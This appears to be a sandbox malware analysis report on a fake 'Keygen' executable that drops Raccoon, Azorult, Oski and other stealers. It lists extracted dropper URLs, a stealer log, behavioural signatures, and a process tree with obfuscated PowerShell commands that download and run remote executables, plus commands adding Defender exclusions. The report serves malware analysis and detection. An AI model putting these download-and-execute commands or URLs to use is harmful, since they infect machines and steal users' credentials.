Overview

overview

10

Static

static

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...en.exe

windows7_x64

10

201001-nyh...en.exe

windows10_x64

10

Resubmissions

02-10-2020 21:14

201002-pjxdl9y6a6 10

01-10-2020 20:51

201001-e45lwcxsnn 10

01-10-2020 20:51

201001-fhxddb9gwe 10

01-10-2020 20:51

201001-ts8hns28ea 10

01-10-2020 20:51

201001-v1kt3kgljx 10

01-10-2020 20:51

201001-d2fbtjzv4s 10

01-10-2020 20:51

201001-cgj9prs442 10

01-10-2020 20:49

201001-t1jnpvwcgx 10

Analysis

  • max time kernel
    131s
  • max time network
    166s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    02-10-2020 21:14

General

  • Target

    201001-nyhbt4p25j_pw_infected/Keygen — копия — копия.exe

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhHT

exe.dropper

http://bit.do/fqhHT

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJv

exe.dropper

http://bit.do/fqhJv

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe

exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJD

exe.dropper

http://bit.do/fqhJD

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://rbcxvnb.ug/zxcvb.exe

exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Path

C:\Users\Admin\AppData\LocalLow\machineinfo.txt

Family

raccoon

Ransom Note
[Raccoon Stealer] - v1.5.13-af-hotfix Release Build compiled on Mon Jul 6 14:33:02 2020 Launched at: 2020.10.02 - 21:56:52 GMT Bot_ID: BAE8C589-5DA1-4C62-BE46-F8D74908CB8C_Admin Running on a desktop =R=A=C=C=O=O=N= - Cookies: 0 - Passwords: 0 - Files: 0 System Information: - System Language: English - System TimeZone: -0 hrs - IP: 154.61.71.51 - Location: 37.750999, -97.821999 | ?, ?, United States (?) - ComputerName: AVGLFESB - Username: Admin - Windows version: NT 6.1 - Product name: Windows 7 Professional - System arch: x64 - CPU: Persocon Processor 2.5+ (2 cores) - RAM: 2047 MB (451 MB used) - Screen resolution: 1280x720 - Display devices: 0) Standard VGA Graphics Adapter ============

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Contains code to disable Windows Defender 2 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon log file 1 IoCs

    Detects a log file produced by the Raccoon Stealer.

  • ModiLoader Second Stage 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 24 IoCs
  • Loads dropped DLL 50 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 1 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 5 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия — копия.exe
    "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия — копия.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1440
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\46C0.tmp\start.bat" "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — ????? — ?????.exe""
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1528
      • C:\Users\Admin\AppData\Local\Temp\46C0.tmp\Keygen.exe
        Keygen.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:1796
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\46C0.tmp\m.hta"
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:1872
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1596
          • C:\Users\Public\szx.exe
            "C:\Users\Public\szx.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            PID:2500
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:2556
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                PID:2696
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /pid 2696 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\684781780779063\\* & exit
                  8⤵
                    PID:1572
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /pid 2696
                      9⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2952
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:2584
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:2668
              • C:\Users\Public\szx.exe
                "C:\Users\Public\szx.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Drops desktop.ini file(s)
                • Modifies system certificate store
                PID:2640
                • C:\Users\Admin\AppData\Local\Temp\wpETxqBf21.exe
                  "C:\Users\Admin\AppData\Local\Temp\wpETxqBf21.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2508
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
                    "Powershell" Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Local\Temp\wpETxqBf21.exe"'
                    8⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2156
                • C:\Users\Admin\AppData\Local\Temp\OGRNSMkwcK.exe
                  "C:\Users\Admin\AppData\Local\Temp\OGRNSMkwcK.exe"
                  7⤵
                  • Executes dropped EXE
                  • Modifies system certificate store
                  PID:292
                  • C:\Windows\SysWOW64\Notepad.exe
                    "C:\Windows\System32\Notepad.exe"
                    8⤵
                      PID:2512
                  • C:\Users\Admin\AppData\Local\Temp\Jr2jbh2rcO.exe
                    "C:\Users\Admin\AppData\Local\Temp\Jr2jbh2rcO.exe"
                    7⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of SetWindowsHookEx
                    PID:2704
                    • \??\c:\windows\SysWOW64\cmstp.exe
                      "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\nvn2omh3.inf
                      8⤵
                        PID:2440
                    • C:\Users\Admin\AppData\Local\Temp\aBBorOfpB2.exe
                      "C:\Users\Admin\AppData\Local\Temp\aBBorOfpB2.exe"
                      7⤵
                      • Executes dropped EXE
                      • Windows security modification
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2916
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "powershell" Get-MpPreference -verbose
                        8⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:304
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\szx.exe"
                      7⤵
                        PID:2668
                        • C:\Windows\SysWOW64\timeout.exe
                          timeout /T 10 /NOBREAK
                          8⤵
                          • Delays execution with timeout.exe
                          PID:1780
              • C:\Windows\SysWOW64\mshta.exe
                "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\46C0.tmp\m1.hta"
                3⤵
                • Modifies Internet Explorer settings
                • Suspicious use of WriteProcessMemory
                PID:1120
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                  4⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1584
              • C:\Windows\SysWOW64\timeout.exe
                timeout 1
                3⤵
                • Delays execution with timeout.exe
                PID:1880
              • C:\Windows\SysWOW64\mshta.exe
                "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\46C0.tmp\b.hta"
                3⤵
                • Modifies Internet Explorer settings
                • Suspicious use of WriteProcessMemory
                PID:2024
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
